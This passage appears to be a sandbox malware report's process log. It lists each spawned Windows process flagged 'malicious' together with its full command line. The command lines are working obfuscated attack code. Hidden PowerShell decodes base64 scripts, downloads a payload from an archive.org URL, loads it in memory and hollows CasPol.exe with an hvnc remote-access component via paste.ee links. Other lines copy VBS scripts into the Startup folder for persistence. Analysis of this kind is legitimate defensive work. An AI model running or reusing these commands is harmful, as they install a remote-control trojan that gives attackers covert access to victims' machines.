J1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\hvnc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
 malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_32.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_pow.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = 